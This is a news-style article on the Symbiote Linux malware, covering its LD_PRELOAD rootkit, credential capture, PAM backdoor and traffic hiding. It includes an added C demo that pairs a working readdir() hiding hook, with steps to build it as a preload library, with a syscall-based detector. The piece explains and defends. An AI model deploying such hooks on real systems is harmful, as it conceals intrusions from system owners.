Symbiote, malware that injects backdoors and rootkits into Linux

Researchers at Intezer and BlackBerry recently announced that they have discovered malware code-named "Symbiote", whose purpose is to inject backdoors and rootkits into compromised Linux servers.

The malware was found on systems belonging to financial institutions in several Latin American countries. A distinguishing feature of Symbiote is that it is distributed as a shared library which is loaded into every newly started process through the LD_PRELOAD mechanism, where it interposes on (replaces) selected functions of the standard C library.

What sets Symbiote apart from other Linux malware we regularly come across is that it needs to infect other running processes in order to inflict damage on infected computers.

Rather than being a stand-alone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes via LD_PRELOAD (T1574.006) and parasitically infects the machine. Once it has infected all running processes, it provides the threat actor with rootkit functionality, the ability to collect credentials, and remote access capability.

To install Symbiote on a system, an attacker must already have root access, since loading a library into every process on the machine requires it; that access can be obtained, for example, by exploiting unpatched vulnerabilities or by compromising accounts. Symbiote then lets the attacker keep a foothold after the break-in to carry out further attacks, hide the activity of other malicious programs, and intercept sensitive data.

Our earliest detection of Symbiote is from November 2021, and it appears to have been written to target the financial sector in Latin America. Once malware has infected a machine, it hides itself and any other malware used by the threat actor, making infections very difficult to detect. Performing live forensics on an infected machine may not reveal anything, as the malware hides all files, processes, and network artifacts. In addition to rootkit capability, the malware provides a backdoor for the threat actor to log in as any user on the machine with a hardcoded password and execute commands with the highest privileges.

The hooked library functions hide everything related to the backdoor: they drop entries from the process list, block access to certain files under /proc, hide files in directory listings, remove the malicious shared library from ldd output (execve is intercepted, and calls that carry the LD_TRACE_LOADED_OBJECTS environment variable, which is what ldd sets, are handled specially), and suppress network sockets associated with the malicious activity.
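As an added illustration (this is not Symbiote's code and is not taken from the researchers' report), the C program below shows both halves of what the paragraph describes: a readdir() interposed in the LD_PRELOAD style that hides directory entries, and a check that bypasses libc by calling the getdents64 syscall directly, so the hook cannot filter it. The HIDE_PREFIX marker, the constructed sample directory and the function names are assumptions made for this demo; Symbiote matches its own file list rather than a prefix.

```c
/* Added example, not Symbiote's code: an LD_PRELOAD-style readdir() hook that
 * hides entries, next to a detection routine that reads the directory through
 * the raw getdents64 syscall.  Build: gcc -o demo demo.c  (add -ldl on glibc
 * older than 2.34). */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical marker: entries whose name starts with this are concealed. */
#define HIDE_PREFIX "hidden_"

static int should_hide(const char *name)
{
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Interposed readdir(): resolves the real libc symbol with RTLD_NEXT and
 * skips entries the rootkit wants hidden.  Built as a shared object and
 * listed in LD_PRELOAD, this is how such hooks change what ls, find and
 * file scanners see.  Here it interposes for this executable only. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL)
        if (!should_hide(e->d_name))
            return e;
    return NULL;
}

/* Count entries (excluding . and ..) the way a normal program does:
 * through libc, hence through any interposed hook. */
int count_via_libc(const char *path)
{
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, ".") && strcmp(e->d_name, ".."))
            n++;
    closedir(d);
    return n;
}

/* Count entries by issuing getdents64 directly.  The syscall boundary is
 * below libc, so an LD_PRELOAD hook never sees this call; a statically
 * linked ls bypasses the hook for the same reason. */
int count_via_syscall(const char *path)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[8192];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long off = 0; off < nread;) {
            /* glibc's struct dirent64 has the kernel's linux_dirent64 layout */
            struct dirent64 *e = (struct dirent64 *)(buf + off);
            if (strcmp(e->d_name, ".") && strcmp(e->d_name, ".."))
                n++;
            off += e->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Number of entries the hook is concealing; 0 on a clean system. */
int hidden_entries(const char *path)
{
    return count_via_syscall(path) - count_via_libc(path);
}

/* Constructed sample input: a temp directory holding one ordinary file and
 * one file carrying the hidden prefix.  Returns the path (caller frees). */
char *make_sample_dir(void)
{
    char tmpl[] = "/tmp/symbiote_demo_XXXXXX";
    if (!mkdtemp(tmpl)) return NULL;
    const char *names[] = { "visible.txt", HIDE_PREFIX "payload.so" };
    for (int i = 0; i < 2; i++) {
        char p[512];
        snprintf(p, sizeof p, "%s/%s", tmpl, names[i]);
        int fd = open(p, O_WRONLY | O_CREAT, 0600);
        if (fd >= 0) close(fd);
    }
    return strdup(tmpl);
}

int main(void)
{
    char *dir = make_sample_dir();
    printf("libc sees %d entries, kernel sees %d, hidden: %d\n",
           count_via_libc(dir), count_via_syscall(dir), hidden_entries(dir));
    free(dir);
    return 0;
}
```

On a clean system the two counts agree for every directory; a difference means something between the program and the kernel is filtering the listing. To turn the hook into a real preload library, drop main(), build with -shared -fPIC and set LD_PRELOAD, then compare the output of the system ls with a statically linked one on the same directory.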

Symbiote also evades some file-system activity monitors: it does not need to open sensitive files itself, because it intercepts the read operations that legitimate applications perform on them (the substituted library functions can capture a password typed by the user, or the contents of a key file an application loads for data access).

Since it is extremely elusive, a Symbiote infection is likely to "fly under the radar." In our investigation, we have not found enough evidence to determine whether Symbiote is being used in broad or highly targeted attacks.

For remote access, Symbiote hooks several PAM (Pluggable Authentication Modules) functions, so that the attacker can log in over SSH using the backdoor's own credentials. There is also a hidden option to elevate privileges to root by setting the HTTP_SETTHIS environment variable.

To hide its network traffic from inspection, Symbiote redefines libpcap functions, filters what is read from /proc/net/tcp, and inserts its own filter code into the BPF programs that packet-capture tools load into the kernel, so that its packets never appear in captures.

Finally, if you are interested in knowing more about this, you can consult the original article at the following link
